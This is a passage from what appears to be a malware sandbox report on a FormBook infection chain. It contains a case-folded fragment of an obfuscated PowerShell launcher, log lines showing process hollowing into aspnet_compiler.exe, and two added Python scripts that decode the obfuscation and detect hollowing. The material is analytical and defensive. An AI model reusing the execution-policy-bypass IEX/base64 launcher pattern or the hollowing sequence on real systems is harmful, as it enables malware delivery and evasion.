lje2oc43ljcvmzu2l0lfbmv0ym9va3vwzgf0aw9ulnzicyisiirltny6qvbqrefuqvxfbmv0ym9va3vwzgf0aw9ulnzicyismcwwkttzvgfsvc1ttgvfccgzktttdgfsvcagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcrw5ldgjvb2t1cgrhdglvbi52ynmi'+[char]34+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Queries volume information: C:\Users\user\AppData\Local\Temp\temp_exec.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
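The process chain in this section is mshta.exe, then cmd.exe, then powershell.exe, which in turn starts csc.exe (an inline compile consistent with Add-Type) and wscript.exe on Enetbookupdation.vbs, which drops and runs temp_exec.exe. The PowerShell stage uses three cheap obfuscations at once: random letter case in every token (the "PowerShell case anomaly" signature), the static-member operator "::" assembled at run time from [char]0x3A+[char]58 so the string [System.Convert]::FromBase64String never appears literally, and a base64 blob decoded and handed to a nested IEX. Two practitioner caveats: PowerShell accepts unambiguous parameter prefixes, so -ex is -ExecutionPolicy and -nop is -NoProfile; and the lower-cased rendering of the command line that the case-anomaly entries print cannot be decoded, because base64 is case-sensitive, so always decode from the original-case command line as shown in the first two "Process created" entries. The script below is an added example, not code from the report; it works on a constructed command line that has the same shape as the one in the report but carries a harmless placeholder second stage, since the real payload is elided or case-folded on this page.

```python
import base64
import re

# Constructed sample for this example: same obfuscation shape as the report's
# command line, but the base64 wraps a harmless placeholder, NOT the sample's payload.
SAMPLE_STAGE2 = "Write-Output 'constructed second stage - not the real payload'"
SAMPLE_B64 = base64.b64encode(SAMPLE_STAGE2.encode("utf-8")).decode("ascii")
SAMPLE_CMDLINE = (
    "pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; "
    "Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'"
    "+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'" + SAMPLE_B64 + "'+[ChAr]34+'))')))"
)

# Keywords whose casing a human or script author would write consistently.
# Allowed spellings: all-lower, all-upper, Capitalized, or the canonical form.
KEYWORDS = {
    "powershell.exe": "PowerShell.exe",
    "bypass": "Bypass",
    "nop": "NoP",
    "noprofile": "NoProfile",
    "iex": "IEX",
    "frombase64string": "FromBase64String",
}


def has_case_anomaly(cmdline: str) -> bool:
    """True when a well-known token appears in irregular mixed case (e.g. 'ByPASs')."""
    for m in re.finditer(r"[A-Za-z][A-Za-z0-9.]*", cmdline):
        tok = m.group(0)
        canon = KEYWORDS.get(tok.lower())
        if canon is None:
            continue
        if tok not in {tok.lower(), tok.upper(), tok.capitalize(), canon}:
            return True
    return False


_PIECE = re.compile(r"'((?:[^']|'')*)'|\[char\]\s*(0x[0-9a-fA-F]+|\d+)", re.IGNORECASE)


def resolve_char_concat(expr: str) -> str:
    """Statically evaluate 'lit'+[char]N+'lit'+... into one string.
    Only single-quoted literals and [char] casts are interpreted, in order of
    appearance; for the shape above that yields the expression the inner IEX runs."""
    out = []
    for m in _PIECE.finditer(expr):
        if m.group(1) is not None:
            out.append(m.group(1).replace("''", "'"))   # '' is an escaped quote
        else:
            out.append(chr(int(m.group(2), 0)))         # 0x3A and 58 both -> ':'
    return "".join(out)


_B64_CALL = re.compile(r'FromBase64String\(\s*"([A-Za-z0-9+/=\s]+)"\s*\)', re.IGNORECASE)


def extract_stage2(cmdline: str) -> dict:
    """Recover the decoded second stage from the obfuscated command line."""
    inner = resolve_char_concat(cmdline)
    m = _B64_CALL.search(inner)
    if not m:
        return {"status": "no-base64-call", "inner": inner}
    b64 = re.sub(r"\s+", "", m.group(1))
    if len(b64) > 40 and not any(c.isupper() for c in b64):
        # Base64 is case-sensitive: a long blob with no capitals means the tool
        # that printed the line lower-cased it, so the real bytes are gone.
        return {"status": "case-folded-base64", "inner": inner}
    try:
        text = base64.b64decode(b64, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return {"status": "decode-failed", "inner": inner}
    return {"status": "ok", "inner": inner, "stage2": text}


if __name__ == "__main__":
    print("case anomaly:", has_case_anomaly(SAMPLE_CMDLINE))
    print("inner expression:", resolve_char_concat(SAMPLE_CMDLINE))
    print(extract_stage2(SAMPLE_CMDLINE))
    print("case-folded copy:", extract_stage2(SAMPLE_CMDLINE.lower())["status"])
```

The decode uses UTF-8 because the command line itself names UTF8.GetString; a -EncodedCommand payload would be UTF-16LE instead. Anything the second stage does next (here, the download and wscript.exe launch of Enetbookupdation.vbs) should be read from the decoded text, not inferred from the wrapper.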

Stealing of Sensitive Information

Source: Yara match File source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
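Both Yara sections match the same artefacts: the region at 0x400000 inside aspnet_compiler.exe (13.2.aspnet_compiler.exe.400000.0.unpack and the corresponding memory dump), which is exactly where the HIPS / PFW section shows temp_exec.exe allocating execute-read-write memory in its own freshly started child and writing data that begins with 4D5A ("MZ"). That sequence, a benign signed host process started by the injector, an executable region reserved at the image base, a PE header and then sections written in, and a further write to 7EFDE008, is the process-hollowing pattern FormBook uses, and the Yara hits confirm the written image is the FormBook payload. The write at 7EFDE008 is not labelled by the report; it is consistent with the ImageBaseAddress field at PEB+0x08 of a 32-bit process, which hollowing updates to point at the new image, and the script treats it as a heuristic only. The script is an added example written for this page, not sandbox code: it parses the report's own "Process created" / "Memory allocated" / "Memory written" lines (copied as constructed input) and emits one finding per injected image, with the base to dump for Yara scanning.

```python
import re
from collections import defaultdict

# Constructed input for this example: the lines of the report's HIPS / PFW section
# that record temp_exec.exe's interaction with aspnet_compiler.exe, copied verbatim.
REPORT_LINES = [
    r'Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\temp_exec.exe "C:\Users\user\AppData\Local\Temp\temp_exec.exe" Jump to behavior',
    r'Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" Jump to behavior',
    r'Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write Jump to behavior',
    r'Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A Jump to behavior',
    r'Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 Jump to behavior',
    r'Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000 Jump to behavior',
    r'Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 7EFDE008 Jump to behavior',
]

# "Source: <src> <action>: <rest> [Jump to ...]"; lazy groups tolerate spaces in paths.
_LINE = re.compile(
    r"^Source: (?P<src>.+?) (?P<action>Process created|Memory allocated|Memory written): "
    r"(?P<rest>.*?)(?: Jump to [\w ]+)?$"
)
_CREATE = re.compile(r'^(?P<target>.+?)(?: "|$)')
_ALLOC = re.compile(r"^(?P<target>.+?) base: (?P<base>[0-9A-Fa-f]+) protect: (?P<prot>.+)$")
_WRITE = re.compile(
    r"^(?P<target>.+?) base: (?P<base>[0-9A-Fa-f]+)(?: value starts with: (?P<magic>[0-9A-Fa-f]+))?$"
)


def detect_hollowing(lines) -> list:
    """One finding per (injector, target, base) where the injector reserved
    executable memory in a foreign process and wrote a PE header (4D5A) there."""
    allocs = defaultdict(dict)   # (src, target) -> {base: protection}
    writes = defaultdict(dict)   # (src, target) -> {base: magic or None}
    created = set()              # (src, target) pairs the injector started itself
    for line in lines:
        m = _LINE.match(line.strip())
        if not m:
            continue
        src, action, rest = m.group("src", "action", "rest")
        if action == "Process created":
            c = _CREATE.match(rest)
            if c:
                created.add((src, c.group("target")))
        elif action == "Memory allocated":
            a = _ALLOC.match(rest)
            if a:
                allocs[(src, a.group("target"))][int(a.group("base"), 16)] = a.group("prot")
        else:
            w = _WRITE.match(rest)
            if w:
                base, magic = int(w.group("base"), 16), w.group("magic")
                d = writes[(src, w.group("target"))]
                if magic or base not in d:     # keep the write that carried a magic
                    d[base] = magic
    findings = []
    for key, regions in allocs.items():
        for base, prot in regions.items():
            magic = (writes[key].get(base) or "").upper()
            if "execute" in prot.lower() and magic == "4D5A":
                written = sorted(writes[key])
                findings.append({
                    "injector": key[0],
                    "target": key[1],
                    "image_base": base,
                    "protection": prot,
                    "created_by_injector": key in created,
                    "written_regions": written,
                    # Heuristic (assumption, not a report label): an address ending in
                    # 0x008 high in 32-bit user space matches PEB.ImageBaseAddress.
                    "peb_like_writes": [a for a in written if a & 0xFFF == 0x008 and a >= 0x7E000000],
                })
    return findings


if __name__ == "__main__":
    for f in detect_hollowing(REPORT_LINES):
        print(f"{f['injector']} -> {f['target']}: PE image written at 0x{f['image_base']:X} "
              f"(child started by injector: {f['created_by_injector']}); "
              f"dump this region for Yara; PEB-like writes: {[hex(a) for a in f['peb_like_writes']]}")
```

The finding's image base is the region to carve from the target's memory dump, which is how the report's 13.2.aspnet_compiler.exe.400000 unpack was produced; for live detection the equivalent telemetry is a cross-process VirtualAllocEx with execute protection followed by WriteProcessMemory of an MZ header into a process the writer itself created suspended.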